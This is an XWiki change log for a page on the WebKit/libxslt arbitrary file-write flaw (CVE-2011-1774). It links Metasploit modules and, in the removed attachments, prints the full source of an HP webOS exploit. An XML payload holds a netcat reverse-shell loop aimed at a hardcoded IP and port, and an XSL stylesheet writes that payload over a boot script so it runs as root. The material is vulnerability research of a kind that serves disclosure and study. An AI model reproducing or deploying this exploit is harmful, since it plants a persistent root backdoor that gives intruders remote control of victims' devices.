Changes for page Application_Webkit

Summary

• Page properties (2 modified, 0 added, 0 removed)
• Attachments (0 modified, 0 added, 4 removed)
  • ipad-tmp-owned.png
  • macos-tmp-owned.png
  • webos-root-backdoor.xml
  • webos-root-backdoor.xsl

Details

Page properties

Tags

...	...	@@ -1,1 +1,0 @@
1		-webkit|libxslt|metasploit|webOS|Apple|Safari|iPhone|iPad|exploit

Content

...	...	@@ -1,10 +5,6 @@
1		-{{toc/}}
2		-
3		-= Introduction =
4		-
5	5	Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Webkit||rel="__blank"]] : "//WebKit is a layout engine designed to allow web browsers to render web pages. WebKit powers Google Chrome and Apple Safari that by December 2011 held 33.35% of the browser market share between them (according to StatCounter). It is also used as the basis for the experimental browser included with the Amazon Kindle ebook reader, as well as the default browser in the iOS, Android and webOS mobile operating systems."//
6	6
7		-= Applications =
	3	+== Applications ==
8	8
9	9	Webkit is used as the rendering engine of numerous browsers :
10	10
...	...	@@ -25,31 +25,21 @@
25	25	* Valve Steam : untested
26	26	* and much more ...
27	27
28		-= File creation vulnerability =
	24	+== File creation vulnerability ==
29	29
30	30	Webkit uses [[libxslt>>Engine_libxslt]] as its XSLT engine. Old versions were not restricting __write__ access by the engine to the file system, leading to a remotely exploitable vulnerability ([[CVE-2011-1774>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774||rel="__blank"]]). This was patched in [[Changeset 79159>>http://trac.webkit.org/changeset/79159||rel="__blank"]] by adding appropriate calls to xsltSetSecurityPrefs().
31	31
32	32
33		-PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability :
	29	+PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
34	34
35		-[[image:macos-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
	31	+== Exploits ==
36	36
37		-
38		-
39		-[[image:ipad-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
40		-
41		-= Metasploit =
42		-
43	43	Two modules are included in Metasploit :
44	44
45	45	* a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
46	46	* an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
47	47
48		-= HP webOS 3.x =
	38	+An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
49	49
50		-An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
51		-
52		-* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction triggering the XSLT code
53		-* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
54		-
55		-Browsing the XML file from a vulnerable device is enough to trigger the exploit. This was patched during the 3.0.2 OTA update.
	40	+* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
	41	+* XSL reads the XML file and create the requested file on disk

ipad-tmp-owned.png

Author

...	...	@@ -1,1 +1,0 @@
1		-xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,1 +1,0 @@
1		-11.9 KB

Content

macos-tmp-owned.png

Author

...	...	@@ -1,1 +1,0 @@
1		-xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,1 +1,0 @@
1		-12.4 KB

Content

webos-root-backdoor.xml

Author

...	...	@@ -1,1 +1,0 @@
1		-xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,1 +1,0 @@
1		-1.7 KB

Content

...	...	@@ -1,54 +1,0 @@
1		-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2		-<?xml-stylesheet type="text/xsl" href="webos-root-backdoor.xsl"?>
3		-<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4		-
5		-# Backdoor, by Nicolas Gregoire / Agarri
6		-IP="192.168.2.89"
7		-PORT="4444"
8		-
9		-MKNOD="/bin/mknod"
10		-NC="/usr/bin/nc"
11		-FIFO="/tmp/.a"
12		-
13		-( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) &
14		-# End backdoor
15		-
16		-
17		-# Set this to save a file across reboots to indictate on boot that
18		-# umount happened correctly (and that, e.g. battery wasn't pulled)
19		-MOUNT_STAMP=/var/umount.stamp
20		-# tags used in MOUNT_STAMP
21		-REASON_MARK=reason
22		-CLEAN_UMOUNT_MARK=date
23		-
24		-# name of system property holding true/false based on presence of
25		-# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined
26		-# otherwise
27		-MOUNT_PROPERTY=last_umount_clean
28		-
29		-# file that contains 1 if / should be remounted rw, 0 otherwise
30		-REMOUNT_TOKEN="/etc/.rootfs_RW"
31		-
32		-# If an fsck or reformat of /media/internal was required on boot, set
33		-# this property.
34		-MEDIA_FIX_PROPERTY=media_fixed_how
35		-
36		-WIPE_FLAGS_DIR=/var/.flags
37		-WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount
38		-WIPE_PROGRESS=/var/.sought_blocks
39		-
40		-# MMC_PROTECT_OPTS=-f
41		-MMC_PROTECT_OPTS=""
42		-MMC_PROTECT_DISABLED=1
43		-mmc_boot_update() {
44		- if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then
45		- BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline)
46		- ON_OFF=1 # on by default
47		- if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then
48		- ON_OFF=0
49		- fi
50		- mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF
51		- fi
52		-}
53		-]]></content></exploit>
54		-

webos-root-backdoor.xsl

Author

...	...	@@ -1,1 +1,0 @@
1		-xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,1 +1,0 @@
1		-816 bytes

Content

...	...	@@ -1,17 +1,0 @@
1		-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2		- <!-- Of course, the webOS browser runs as 'root' ;-) -->
3		- <xsl:template match="/">
4		- <!-- Grab some values from the XML file -->
5		- <xsl:variable name="content" select="//content/text()"/>
6		- <xsl:variable name="location" select="//location/text()"/>
7		- <html><body>
8		- <!-- Drop the backdoor, overwriting the previous configuration file -->
9		- <xsl:document href="{$location}" method="text"><xsl:copy-of select="$content"/></xsl:document>
10		- <!-- Display something to the user -->
11		- File '<xsl:copy-of select="$location"/>' has been overwritten ...<br/>
12		- <!-- Ask for a reboot. We could force it too ... -->
13		- Now reboot and wait for your reverse-shell ;-)<br/>
14		- </body></html>
15		- </xsl:template>
16		-</xsl:stylesheet>
17		-